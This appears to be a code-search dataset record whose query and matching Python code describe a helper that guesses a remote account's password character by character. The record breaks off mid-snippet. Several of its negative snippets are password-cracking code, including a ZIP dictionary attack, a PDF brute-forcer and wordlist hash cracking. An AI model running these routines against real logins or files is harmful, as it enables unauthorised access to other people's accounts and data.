[ "0.7345728", "0.63285416", "0.6295855", "0.6295855", "0.6295855", "0.6295855", "0.6248521", "0.6134753", "0.6081834", "0.6037675", "0.60087425", "0.60087425", "0.60087425", "0.5981202", "0.58713824", "0.5847541", "0.5844085", "0.5784419", "0.5778379", "0.57567716", "0.5748923", "0.5732151", "0.5724007", "0.5698116", "0.56890285", "0.56728554", "0.56453645", "0.5633184", "0.56330824", "0.56323993", "0.5619063", "0.56095123", "0.5603394", "0.55648845", "0.5562105", "0.55591244", "0.5553795", "0.55504817", "0.5531478", "0.55311775", "0.55160105", "0.55160105", "0.5504568", "0.55043036", "0.5480531", "0.5477004", "0.5477004", "0.5477004", "0.5449778", "0.5443647", "0.5424742", "0.5398503", "0.53896534", "0.5389644", "0.53808904", "0.5380249", "0.53744507", "0.53665906", "0.5343387", "0.5342581", "0.5323371", "0.53205526", "0.53186244", "0.52960914", "0.52808225", "0.5254086", "0.5248224", "0.52311254", "0.52293015", "0.522578", "0.5220939", "0.5220939", "0.5220939", "0.5205152", "0.51909965", "0.5187803", "0.5185821", "0.5181714", "0.5179321", "0.5177283", "0.5175595", "0.5173398", "0.51702654", "0.516184", "0.51576304", "0.5141278", "0.51352894", "0.5127471", "0.51172745", "0.51118225", "0.5097097", "0.50947905", "0.5093373", "0.5085274", "0.50842357", "0.50828147", "0.5081467", "0.50807905", "0.5079265", "0.5070332", "0.50621927" ]
0.0
-1
helper function for checkPass returns the first element of charList found that works for the password at index i if it fails to find a character at i, prints i and returns an empty string instead of returning i.
def findChar(username, url, charList, i): for ch in charList: if(checkPasswordCharacter(ch, username, url, index = i)): return ch #only runs if no ch in charList match: # return i #oof, there's no match if i is out of bounds, e.g. len(password) < i print("Missing: " + i) #so I know when it's not a match return "" #return an empty string instead # Note to self: should not return an _ because it'll match an _ if wildCards are true (default). # If wildCards is false, this will just skip characters that don't match anything!
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def checkPass(username, url, charList, n):\n # dikt = {}\n password = \"\"\n for i in range(0, n):\n if(testPassword(password, username, url)):\n return password #password is found! \n # https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python\n ch = findChar(username, url, charList, i)\n # if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string \n # use try except instead of if(isinstance(ch, int)):\n # https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not\n try: \n password += ch\n except TypeError:\n # print(i)\n password += str(ch) #should be blank\n # raise ValueError(\"index i has no matching character\")\n return password #only reached if password is too long for the given n", "def valid_password(lower, upper, letter, password):\n # Note the -1 to turn 1 indexing into 0 indexing\n matches = [idx for idx in (lower, upper) if password[idx - 1] == letter]\n return len(matches) == 1", "def check_pass(password):\n # big_chain : length of longest chain of repeated symbols\n # c_start : index at which big_chain starts\n big_chain = 0\n cur_loc = 0\n for symb in password:\n if big_chain == 0:\n l_symb = symb\n cur_chain = 1\n big_chain = 1\n c_start = 0\n cur_c = cur_loc\n cur_loc += 1\n continue\n if symb == l_symb:\n cur_chain += 1\n else:\n cur_chain = 1\n cur_c = cur_loc\n if cur_chain > big_chain:\n big_chain = cur_chain\n c_start = cur_c\n cur_loc += 1\n l_symb = symb\n\n # return or repeat, need big_chain, c_start\n if big_chain < 2:\n return False\n if big_chain == 2:\n return True\n return (check_pass(password[:c_start])\n or check_pass(password[c_start+big_chain:]))", "def solve_part_two(self):\n password = list(\"XXXXXXXX\")\n index = 0\n counter = 0\n while counter < 8:\n (s, found_index) = self.find_next_hash(index)\n index = found_index + 1\n offset = ord(s[5]) - ord(\"0\")\n # Offset invalid or password character already set previously?\n if offset >= 8 or password[offset] != \"X\":\n continue\n password[offset] = s[6]\n counter += 1\n return \"\".join(password)", "def pass_check(user_found):\n password = ''\n while password != user_found[1]:\n password = stdiomask.getpass(prompt=\"Please enter your password: \", mask='*')\n pass1 = encrypter.encrypt_password(password)\n if user_found[1] == pass1:\n return \"\\nPassword match\\n\"\n else:\n print(\"\\nPassword do not match\\n\")", "def find_pass(pass_list, service):\r\n for pass_info in pass_list:\r\n if pass_info[1] == service:\r\n return pass_info[2]", "def SecondPart():\n return passwordChecker(data)", "def solve_part_one(self):\n password = \"\"\n index = 0\n while len(password) < 8:\n (s, found_index) = self.find_next_hash(index)\n password += s[5]\n index = found_index + 1\n return password", "def get_password():\n\n pwd = getpass(\"Enter your password below. It is used to protect your credentials.\\n\"\n \"The password must have a minimum length of 8 characters \"\n \"and can only contain alphanumeric characters and symbols.\\n\"\n \"Enter password (will be hidden): \")\n\n tries = 0 # Limit number of invalid attempts\n while True:\n if len(pwd) >= 8 and pwd.isascii() and pwd.isprintable() and ' ' not in pwd:\n if getpass(\"Confirm password: \") == pwd:\n return pwd\n else:\n print(\"Password mismatch!\")\n else:\n print(\"Invalid characters in password or too short!\")\n\n if tries == 3: return None\n pwd = getpass(\"\\nRe-enter password: \")\n tries += 1", "def find_password( door_id ):\n\n\tpassword = [ '', '', '', '', '', '', '', '' ]\n\tincrementor = 0\n\t\n\tfor _i in range( 8 ):\n\t\tchar = ''\n\t\twhile not char:\n\t\t\t#_do_stupid_movie_password_animation( password, _i )\n\n\t\t\tinput = door_id + str( incrementor )\n\t\t\tm = hashlib.md5( )\n\t\t\tm.update( input.encode( 'utf-8' ) )\n\t\t\thash = m.hexdigest( )\n\n\t\t\tif hash.startswith( '00000' ):\n\t\t\t\tloc = hash[ 5 ]\n\t\t\t\tchar = hash[ 6 ]\n\t\t\t\tif loc.isdigit( ):\n\t\t\t\t\tloc = int( loc )\n\t\t\t\t\tif 0 <= loc <= ( len( password ) - 1 ) and not password[ loc ]:\n\t\t\t\t\t\tpassword[ loc ] = char\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tchar = ''\n\t\t\t\telse:\n\t\t\t\t\tchar = ''\n\t\t\t\n\t\t\tincrementor += 1\n\n\tpassword = ''.join( password )\n\treturn password", "def get_password(args):\n for password in args:\n heashed=hash_password(password)\n print(heashed)\n # checked=check_password(heashed)", "def passwd_prompt():\n\n print(\"Passwords MUST contain AT LEAST: one lower-case letter,\" \n \"one number, one symbol, and be a MINIMUM of 8 characters in length,\"\n \"e.g. r!ght2oE\")\n\n while True:\n\n passy = getpass.getpass(prompt=\"Enter password for user: \")\n confirm_passy = getpass.getpass(prompt=\"To confirm, \" \\\n \"re-enter password: \")\n\n # check for the following conditions: \n # user input matches\n # length of input is at least 8 characters\n # input contains at least 1 number \n # input contains at least 1 letter \n # input contains at least 1 symbol \n \n if passy != confirm_passy \\\n or len(passy) <8 \\\n or not re.search('\\d', passy) \\\n or not re.search(r\"[a-z]\",passy) \\\n or not re.search(r\"[ !#$%&'()*+,-./[\\\\\\]^_`{|}~\"+r'\"]', passy): \n \n print(TRY_AGAIN)\n continue \n \n else:\n print(\"Password meets complexity requirement. Continuing...\") \n return passy", "def password(self) -> str:", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def find_valid_passwords(values: List[str]) -> int:\n search_reg = re.compile(\n r\"\\b(?P<first>[0-9]+)-(?P<second>[0-9]+)\\s(?P<letter>[a-z]):\\s(?P<password>[a-z]+)\")\n valid_password_count = 0\n\n for value in values:\n results = search_reg.search(value)\n target_char = results.group(\"letter\")\n password = results.group(\"password\")\n first_index = int(results.group(\"first\")) - 1\n second_index = int(results.group(\"second\")) - 1\n\n if (target_char == password[first_index]) != (target_char == password[second_index]):\n valid_password_count += 1\n\n return valid_password_count", "def FirstPart(): \n return passwordChecker_incorrect(data)", "def get_password(wordlen, digitlen, words, strength):\n\n while True:\n\n try:\n w = words.pop().capitalize()\n except IndexError:\n sys.exit(\"Unable to get a sufficiently strong password\")\n\n s = np.random.choice(SPECIAL_CHARS)\n i = np.random.randint(0, 10**digitlen)\n\n comp = [w, f\"{i:0{digitlen}d}\", s, s]\n np.random.shuffle(comp)\n pw = ''.join(comp)\n\n # pw = str(f\"{s}{w}{i:0{digitlen}d}{s}\")\n stats_pw = PasswordStats(pw)\n\n if stats_pw.strength() >= strength:\n return pw, stats_pw", "def analyze_password(password):\n vowels = number_of_vowels(password)\n if valid_password(password) is True:\n result = password + \" is a valid password and contains \" + str(vowels) + \" vowels.\"\n else:\n result = password + \" is not a valid password and contains \" + str(vowels) + \" vowels.\"\n return result", "def get_pass(self, item):\n text = str(self.get_contents(item), encoding=\"utf-8\")\n lines = text.split(\"\\n\")\n password = lines[0]\n return password", "def num_pw_found(byte_string):\n hasher = hashlib.sha1()\n hasher.update(byte_string)\n digest = hasher.hexdigest().upper()\n pw_list = requests.get('https://api.pwnedpasswords.com/range/{}'.format(digest[:5]))\n for line in pw_list.text.split('\\n'):\n info = line.split(':')\n if info[0] == digest[5:]:\n return int(info[1])\n return 0", "def testPassword(cryptPass, dictionaryFile):\n #salt = cryptPass[0:2]\n salt = crypt.mksalt(crypt.METHOD_SHA512) # Updated for SHA512 encrypted passwords\n dictFile = open(dictionaryFile, 'r')\n for word in dictFile.readlines():\n word = word.strip('\\n')\n cryptWord = crypt.crypt(word, salt)\n \n if cryptWord == cryptPass:\n print('[+] Found Password: ' + word + '\\n')\n return\n print('[-] Password Not Found.\\n')\n return", "def matchpassword(username, password): # create function called matchpassword\n \n List = [] # Initialize list\n\n try:\n f = open(\"C:\\Portable Python 3.2.5.1\\password.txt\",\"r\") # opens password.txt\n List = f.readlines() # Reads password.txt into a list\n f.close() # Closes password.txt file\n except IOError:\n print(\"I/O error: Unable to read in File f\") # Exception if I/O Error\n\n for x in range(0,len(List),2): # Loop thru list to determine if match\n Listlower = List[x].lower()\n if((username.lower() + '\\n' == Listlower) and (password + '\\n' == List[x + 1])):\n return 'True'\n else:\n continue\n return 'False'", "def password_generator(password_lenght):\r\n password = \"\"\r\n\r\n try:\r\n if password_lenght >=1:\r\n for i in range(password_lenght):\r\n choice = random.choice(symbols)\r\n password += str(choice)\r\n print(f\"Your password is: {password} \\nTnank you!\")\r\n return password\r\n else:\r\n return 0\r\n except Exception:\r\n pass", "def extremely_stupid_naive_brute_force_crap():\n keystrokes = [l.strip() for l in open(\"keylog.txt\")]\n for i in range(1000, 10000000):\n if i % 10000 == 0:\n print i\n password = str(i)\n if all(is_subsequence(password, keys) for keys in keystrokes):\n print password\n break", "def is_valid_password_v2(password):\n\n low = password[\"letter\"] == password[\"password\"][password[\"low\"] - 1]\n high = password[\"letter\"] == password[\"password\"][password[\"high\"] - 1]\n\n return xor(low, high)", "def iterate_pword(current_password):\n\n num = _pword_to_num(current_password) # Turn password into list of ints\n for idx in reversed(range(len(num))):\n char_ord = num[idx]\n if char_ord != 122:\n char_ord += 1\n num[idx] = char_ord\n break\n else:\n char_ord = 97\n num[idx] = char_ord\n return _num_to_pword(num)", "def getpassword(description = \"\"):\n\tif (description != \"\"): \n\t\tsys.stdout.write (\"%s\\n\" % description)\n\t\t\n\tpassword1 = getpass.getpass(\"Password: \");\n\tpassword2 = getpass.getpass(\"Password (confirm): \");\n\n\tif (password1 == password2):\n\t\treturn password1\n\telse:\n\t\tsys.stdout.write (colors.ORANGE + \"[Warning] Password did not match, please try again\" + colors.NO + \"\\n\")\n\t\treturn getpassword()", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def generate_password():\n selection = string.ascii_letters + string.digits\n\n while True:\n password = \"\".join(secrets.choice(selection) for i in range(16))\n\n if (\n any(c.isupper() for c in password)\n and any(c.islower() for c in password)\n and any(c.isdigit() for c in password)\n ):\n break\n\n return password", "def _get_password_error_msg(password):\n # At least one letter and one digit\n if not any(c.isalpha() for c in password):\n return (\"The new password must contain at least one letter\", 'no_letter_in_password')\n if not any(c.isdigit() for c in password):\n return (\"The new password must contain at least one digit\", 'no_digit_in_password')\n return None", "def password_validation(pass1,pass2):\n errors = []\n if(pass1 != pass2):\n errors.append(\"Lösenorden matchade inte.\")\n if(len(pass1) < 3):\n errors.append(\"Lösenordet måste vara längre än 3 bokstöver.\")\n \n return errors", "def valida_digito(password):\n for s in password:\n if s.isdigit() == True: \n return True\n return False", "def has_right_symbols(string):\n for letter in string:\n if letter in \"$#@\":\n return True\n # End of the loop, we still didn't see any numbers, else we \n # woud have exited the function\n print(\"Your password needs to contain one of those symbols: $#@\")\n return False", "def check_pwd_policy2(processed):\n policy, letter, pwd = processed\n idx1 = policy[0] - 1\n idx2 = policy[-1] - 1\n return (pwd[idx1] == letter) ^ (pwd[idx2] == letter)", "def password_alphanumeric(i):\r\n\r\n chars = string.ascii_letters + string.digits\r\n return ''.join(_random.choice(chars) for x in range(i))", "def get_new_user_pword():\n pword = input(\"Password (3–20 alphanumeric characters): \")\n menu.option_to_exit(pword)\n try:\n if len(pword) < 3 or len(pword) > 20 or not pword.isalnum():\n raise ValueError\n except ValueError:\n print(\"Password must be 3–20 alphanumeric characters.\\n\"\n \"Please try again.\\n\")\n return get_new_user_pword()\n else:\n return pword", "def main():\n password = input(\"Enter password that contains {} or more characters: \".format(MIN_LENGTH))\n while not is_valid_password(password):\n print(\"Invalid password!\")\n password = input(\"Enter password that contains {} or more characters: \".format(MIN_LENGTH))\n print(\"*\" * len(password))", "def check_password(password):\n\n sha1 = hashlib.sha1(password.encode(\"utf-8\")).hexdigest()\n\n response = requests.get(f\"https://api.pwnedpasswords.com/range/{sha1[:5]}\")\n\n hash_suffix_list = [x.split(\":\") for x in response.text.splitlines(False)]\n\n try:\n count = [\n count for suffix, count in hash_suffix_list if sha1.endswith(suffix.lower())\n ][0]\n except IndexError:\n return 0\n\n return int(count)", "def solve():\n cipher_bytes = get_cipher_bytes()\n best_so_far = 0\n message = None\n for password in get_passwords_iterator():\n possible_message = decrypt_cipher(cipher_bytes, password)\n if possible_message:\n num_spaces = len(filter(lambda x: x == ' ', possible_message))\n if num_spaces >= best_so_far:\n best_so_far = num_spaces\n message = possible_message\n print ''.join(message)\n answer = sum([ord(c) for c in message])\n return answer", "def check_pwd_policy1(processed):\n policy, letter, pwd = processed\n return pwd.count(letter) in policy", "def evaluate_password_health(users, print_password=False):\n hasUpperCase = \"[A-Z]\"\n hasLowerCase = \"[a-z]\"\n hasNumbers = \"\\d\"\n hasNonalphas = \"\\W\"\n results = []\n for username, password in users.items():\n # print(\"testing: %s:%s\" % (username, password))\n if print_password:\n printable_pass = password\n else:\n printable_pass = \"\"\n\n rules_dict = {\"username\":username,\"password\":printable_pass,\"Length\":1,\"Capital\":1,\"Lower\":1,\"Digits\":1,\"Symbols\":1}\n\n if len(password) < 8:\n print(\"Policy breach, too short : %s %s\" % (username, printable_pass))\n rules_dict[\"Length\"] = \"0\"\n\n elif len(password) > 8:\n # print(\"larger than 8\")\n # raw_input('asdfasdf')\n breakRules = []\n score = 0;\n bestCase = 4\n # pprint(re.search(hasUpperCase, password))\n\n if not re.search(hasUpperCase, password):\n breakRules.append(\"no upper case\")\n rules_dict[\"Capital\"] = 0\n # print(\"upper\")\n if not re.search(hasLowerCase, password):\n breakRules.append(\"no lower case\")\n rules_dict[\"Lower\"] = 0\n # print(\"lower\")\n\n if not re.search(hasNumbers, password):\n breakRules.append(\"no numbers\")\n rules_dict[\"Digits\"] = 0\n\n # print(\"numbers\")\n\n if not re.search(hasNonalphas, password):\n breakRules.append(\"non symbols\")\n rules_dict[\"Symbols\"] = 0\n\n # print(\"nonalphas\")\n\n score = bestCase - len(breakRules)\n\n # print(\"%s score %s \"%(password,score)) \n # raw_input('asdfasdf')\n if score <3:\n print(\"================\\nPolicy breach: %s:%s %s \" % (username, printable_pass, score ))\n\n for el in breakRules:\n print(\"Broken Rule: %s\"%el)\n\n print(\"================\")\n results.append(rules_dict)\n return results", "def check_pass(self, user, app):\r\n infos = self.curs.execute(f\"SELECT login, password FROM {user} WHERE application = '{app}'\")\r\n return list(infos)[0]", "def _findHashInChain(self, startPwd, startHash):\n hashV = self.hashWord(startPwd)\n if hashV == startHash:\n return startPwd\n col = 0\n # Hash and reduce until the password has been found or the end of\n # the chain has been reached.\n while col < self.columns:\n pwd = self.reduce(hashV, col)\n hashV = self.hashWord(pwd)\n if hashV == startHash:\n # If the password has been found, return it\n return pwd\n col += 1\n # If the password hasn't been found, return None.\n return None", "def first_unique_character_list(string: str) -> int:\n counts = [0] * 26\n\n def get_idx(character: str) -> int:\n return ord(character) - 97\n\n for char in string:\n idx = get_idx(char)\n counts[idx] += 1\n\n for i, char in enumerate(string):\n idx = get_idx(char)\n if counts[idx] == 1:\n return i\n\n return -1", "def test_valid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']))]))\n\n valid_password(None, pass_field)", "def display_pass():\n return passlocker.display_passlocker()", "def contains_only_double_digit(password: int) -> bool:\n word = str(password)\n\n if word[0] == word[1] and word[0] != word[2]:\n return True\n if word[-2] == word[-1] and word[-2] != word[-3]:\n return True\n\n for i in range(1, len(word)-2):\n if word[i] == word[i+1] and word[i] != word[i+2] and word[i] != word[i-1]:\n return True\n\n return False", "def check_password(pw):\n if (pw == password):\n print('welcome password match')\n\n else:\n print('Wrong password')", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def generate_password(self): \n\n password = []\n length = input(\"Enter Length for Password (At least 8): \")\n\n if length.lower().strip() == \"exit\":\n raise UserExits\n elif length.strip() == \"\":\n raise EmptyField\n elif int(length) < 8:\n raise PasswordNotLongEnough\n else:\n # generating a password\n spinner = Halo(text=colored(\"Generating Password\", \"green\"), spinner=self.dots_, color=\"green\")\n spinner.start()\n for i in range(0, int(length)):\n #choose character from one of the lists randomly\n password.append(random.choice(random.choice([string.ascii_lowercase, string.ascii_uppercase, string.digits, self.specialChar_])))\n\n finalPass = \"\".join(password)\n spinner.stop()\n\n return finalPass", "def valid_password(password):\n val = True\n\n if len(password) < 8:\n val = False\n return val\n\n if not any(char.isdigit() for char in password):\n val = False\n return val\n\n if not any(char.isupper() for char in password):\n val = False\n return val\n\n if not any(char.islower() for char in password):\n val = False\n return val\n\n if val:\n return val", "def find_name_and_password(ip):\r\n names_pass = get_name_pass(ip)\r\n\r\n start = time.time()\r\n\r\n pool = Pool(4) # 4 is number of processes to open at once\r\n results = pool.map(check_name_and_password, names_pass)\r\n pool.close()\r\n\r\n end = time.time()\r\n\r\n print \"\\nTime to complete: %d \\n\" % (end - start)\r\n results = [t for t in results if t] # filters out empty tuples\r\n return results", "def bruteforce_pdf(pdf_file_path: Path, wordlist: list) -> Union[str, None]:\n\n start_time = time.time()\n for word in [\"\"] + wordlist:\n try:\n with Pdf.open(pdf_file_path, password=word):\n if not word:\n return print(f\"\\n{Color.EMPHASIS}The PDF file provided is not encrypted.{Color.END}\")\n print(f\"\\n\\n{Color.INFORMATION}Password is: {Color.EMPHASIS}{word}{Color.END}\")\n print(f\"\\n\\n{Color.DETAIL}Found at index: {wordlist.index(word) + 1}\\n\")\n print(f\"{Color.DETAIL}Time elapsed: {(time.time() - start_time):.3f} secs{Color.END}\")\n return word\n except:\n print(f\"{Color.INFORMATION} Trying: {Color.FAIL}{word}{Color.END}\", end=\"\\r\")\n return print(f\"\\n\\n{Color.EMPHASIS}No password matched from the provided wordlist.{Color.END}\")", "def _cbPasswordMatch(self, matched, username):\r\n if matched:\r\n return username\r\n else:\r\n return failure.Failure(error.UnauthorizedLogin())", "def _cbPasswordMatch(self, matched, username):\r\n if matched:\r\n return username\r\n else:\r\n return failure.Failure(error.UnauthorizedLogin())", "def brute_force_attack(string):\n try:\n for key in range(1, 26):\n string_to_return = \"\"\n for l in string:\n if not(l >= 'A'and l <= 'Z' or l >= 'a'and l <= 'z'):\n string_to_return += l\n elif key + ord(l.upper()) > ord('Z'):\n string_to_return += chr(ord('A') + ord('Z') - ord(l.upper()))\n else:\n string_to_return += chr(ord(l.upper())+key)\n print(string_to_return)\n return string_to_return\n except Exception as ex:\n print(EXCEPTION_MESSAGE, ex)", "def check_for_validity_puzzle_2(pos: tuple, char: str, password: str):\n\n valid_pos, invalid_pos = pos\n # using xor\n if (password[valid_pos-1] == char) ^ (password[invalid_pos-1] == char):\n return True\n else:\n return False", "def password (string):\n\t\n\treturn hexdigest_mySQL41plus (string)", "def Cracker():\n attempts = 0\n flag = 0\n with open(dictionary_attack, 'r') as attack:\n print(\"Cracking password...one sec\")\n print(\"------------------------------\")\n for line in attack:\n \"\"\"\n Using a try...exception to keep attempting\n the different passwords from the wordlist\n \"\"\"\n try:\n # from the wordlist there is newline\n # they need to be stripped\n # encode passwd from str to bytes\n passwd = line.strip('\\n')\n zFile.extractall(pwd=str.encode(passwd))\n except Exception:\n attempts += 1\n pass\n else:\n print(\"Success! Password is %s\" % (passwd))\n flag = 1\n break\n print(\"Attempted %d passwords from %s wordlist\" %\n (attempts, dictionary_attack))\n if flag == 0:\n print(\"Password Cracking Failed! It is too strong for me :(\")", "def check_best_user(correct_user_pass):\r\n best = (\"notfound\", \"notfound\")\r\n for user_pass in correct_user_pass:\r\n if user_pass[0] == \"root\":\r\n best = user_pass\r\n elif user_pass[0] == \"admin\" and best[0] != \"root\":\r\n best = user_pass\r\n elif best[0] != \"root\" and best[0] != \"admin\":\r\n best = user_pass\r\n return best", "def password_is_valid_1(password, character, num_1, num_2):\n # count how often does each character occurs\n counter = Counter(password)\n character_count = counter[character] # defaults to zero if character doesn't exist at all\n return num_1 <= character_count <= num_2", "def is_allowed_password(password):\n if not is_filled_password(password):\n return \"Password is a required field.\"\n elif not is_regex_password(password):\n return \"That is not a valid password.\"\n else:\n return \"\"", "def puzzle(word_list):\n \n multiple_stroke_letters = ['i','j','t','x']\n for word in word_list:\n if word.count('i')==1 and word.count('j')==1 and word.count('t')==1 \\\n and word.count('x')==1:\n print(word)\n break", "def search_bad_chars() -> str:\n\n lines = get_input()\n bad_chars = \"\\\\\"+hex(0) # x00 is always a badchar\n \n for i in range(1,255,8):\n for i in range(i,i+7):\n lines[i] = int(lines[i],16)\n if(hex(i) != hex(lines[i])):\n bad_chars += \"\\\\\"+hex(i)\n \n print(\"Found these bad characters:\",bad_chars)\n\n return bad_chars", "def encontrar_passwords():\n hashes = [\n ('ox', 'ox45K6RsEUfmQ', generar_palabras()), # fido\n ('$1$42dJ1xYh', '$1$42dJ1xYh$MfrRke8/Ej3h5.vMtNEhC.', leer_palabras('./colores.txt')), # white\n ('$6$SZGpKoPi', '$6$SZGpKoPi$GGGqHYKy6PO/H5nvV0AmaGB/5krnxVuz2k2uX81O.CF5nYctE5RlR/rzJQCL3ZsF8yratCRbSR2ZuwKzvve.D0', leer_palabras('./equipos.txt')), # knicks\n ]\n\n encontradas = []\n\n for algo_y_salt, hash_resultado, origen_passwords in hashes:\n for password in origen_passwords:\n if crypt(password, algo_y_salt) == hash_resultado:\n encontradas.append(password)\n break\n\n return encontradas", "def password_is_valid_task_2(row):\n # XOR the two positions in the password\n return (row['letter'] == row['password'][row['policy'][0] - 1]) != \\\n (row['letter'] == row['password'][row['policy'][1] - 1])", "def _do_stupid_movie_password_animation( password, digits_solved ):\n\n\tpwd = copy.copy( password )\n\tfor i in range( len( pwd ) - digits_solved ):\n\t\tchar = ''\n\t\twhile not char:\n\t\t\tval = random.randint( 48, 102)\n\t\t\tif not 58 <= val <= 96:\n\t\t\t\tchar = chr( val )\n\n\t\tvalid_idx = False\n\t\tidx = -1\n\t\twhile not valid_idx:\n\t\t\tidx = random.randint(0, 7)\n\t\t\tif not pwd[ idx ]:\n\t\t\t\tvalid_idx = True\n\t\t\n\t\tpwd[ idx ] = char\n\n\tpwd = ''.join( pwd )\n\tos.system( 'cls' )\n\tprint( pwd )", "def get_user_password(text):\n return getpass.getpass(text)", "def is_valid_password_v1(password):\n letter_count = sum([x == password[\"letter\"] for x in list(password[\"password\"])])\n return password[\"low\"] <= letter_count <= password[\"high\"]", "def get_verified_password(self):\n return self.controller.dbfilter.db.get('passwd/user-password-again')", "def password_alphabetical(i):\r\n\r\n return ''.join(_random.choice(string.ascii_letters) for x in\r\n range(i))", "def alpha_len(password_length):\r\n while True:\r\n alphabet_length = input('How much alphabets you want in password? At least 1 : ')\r\n try:\r\n alphabet_length = int(alphabet_length)\r\n if 1 <= alphabet_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(alphabet_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(alphabet_length))\r\n return alphabet_length", "def test_long_password():\n expect_error(register, InputError,\n \"abcdef\", \"a\" * (MIN_PASSWORD - 1), \"a\", \"A\", \"a\")", "def anypassword():\n\n characters = string.ascii_uppercase + string.ascii_lowercase + string.digits\n size = random.randint(8, 12)\n password = ''.join(random.choice(characters) for x in range(size))\n\n return password", "def get_help_text(self):\n msg = (\n ungettext(\n \"Your password must contain %d or more Non-Alphanumeric character.\",\n \"Your password must contain %d or more Non-Alphanumeric characters.\",\n self.get_min_count(),\n )\n % self.get_min_count()\n )\n return msg", "def first_login_aux(password: str, password_repeat: str) -> [bool]:\n return [\n pw_is_viable(password),\n compare_digest(password_repeat, password)\n ]", "def main():\n\n print(\"Password Generator Service\")\n # If no input is given by user then the maximum length password is genearted\n lengthOfPassword = int(input(\"Enter length of password (8 or greater) or leave blank to generate a password of maximum length i.e. 77 characters\\n\") or int(77))\n # Additional Input Validation\n if lengthOfPassword < 8 or lengthOfPassword > 77:\n print(\"Invalid Entry. Enter a value that is 8 or greater and less than 77 characters as they make secure passwords. Please try again\")\n sys.exit()\n\n upperCaseLowerLimit = 65\n upperCaseUpperLimit = 90\n\n lowerCaseLowerLimit = 97\n lowerCaseUpperLimit = 122\n\n specialSymbolsLowerLimit = 33\n specialSymbolsUpperLimit = 47\n\n upperCaseList = [chr(i) for i in range(upperCaseLowerLimit, upperCaseUpperLimit + 1)]\n lowerCaseList = [chr(i) for i in range(lowerCaseLowerLimit, lowerCaseUpperLimit + 1)]\n specialSymbolsList = [chr(i) for i in range(specialSymbolsLowerLimit, specialSymbolsUpperLimit + 1)]\n numbersList = [i for i in range(0,10)]\n\n \"\"\"\n To generate random characters of even greater length the list might have to be duplicated\n This has not be done now due to practical reasons.\n Sample code for doing so can be seen below\n random.sample(upperCaseList*2, len(upperCaseList)*2)\n \"\"\"\n possibleSymbols = random.sample(upperCaseList, len(upperCaseList)) + random.sample(lowerCaseList, len(lowerCaseList)) \\\n + random.sample(specialSymbolsList, len(specialSymbolsList)) + random.sample(numbersList, len(numbersList))\n # the core functionality that determines the complex password\n random.shuffle(possibleSymbols)\n\n finalPassword = ''.join(str(s) for s in possibleSymbols[:lengthOfPassword])\n\n print(\"Your new password of length {} is generated ==> {}\".format(lengthOfPassword, finalPassword))", "def valid_password(password: Text):\n results = Utility.password_policy.test(password)\n if results:\n response = []\n for result in results:\n if isinstance(result, Length):\n response.append(\"Password length must be \" + str(result.length))\n elif isinstance(result, Special):\n response.append(\"Missing \" + str(result.count) + \" special letter\")\n elif isinstance(result, Uppercase):\n response.append(\"Missing \" + str(result.count) + \" uppercase letter\")\n elif isinstance(result, Numbers):\n response.append(\"Missing \" + str(result.count) + \"number\")\n\n if response:\n raise AppException(\"\\n\".join(response))", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def find(astring, achar):\n ix = 0\n found = False\n while ix < len(astring) and not found:\n if astring[ix] == achar:\n found = True\n else:\n ix = ix + 1\n if found:\n return ix\n else:\n return -1", "def get_help_text(self):\n msg = (\n ungettext(\n \"Your password must contain %d or more alphabetic letter.\",\n \"Your password must contain %d or more alphabetic letters.\",\n self.get_min_count(),\n )\n % self.get_min_count()\n )\n return msg", "def test_check_password():\n assert check_password('Longpassword') == False\n assert check_password('123456') == False\n assert check_password('short') == False\n assert check_password('C0rect') == False\n assert check_password('Correct8') == True", "def prompt_pass():\n msg = \"Enter Password: \"\n password = getpass.getpass(msg)\n return password", "def makeList(username, url, caseSensitive = False, wildCards = True):\n charList = []\n for ch in lower:\n # check for ch in \n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n for ch in numbers:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n for ch in special:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n for ch in other:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n if(caseSensitive):\n for ch in upper:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n if(wildCards):\n for ch in wildcards:\n if(checkPasswordCharacter(str(ch), username, url)):\n charList.append(str(ch))\n print(ch)\n return charList", "def test_find_string():\n assert pi_finder.find_string('j', hex_dict) == (5, 6)\n assert pi_finder.find_string('l', hex_dict) == (61, 62)\n assert pi_finder.find_string('c', 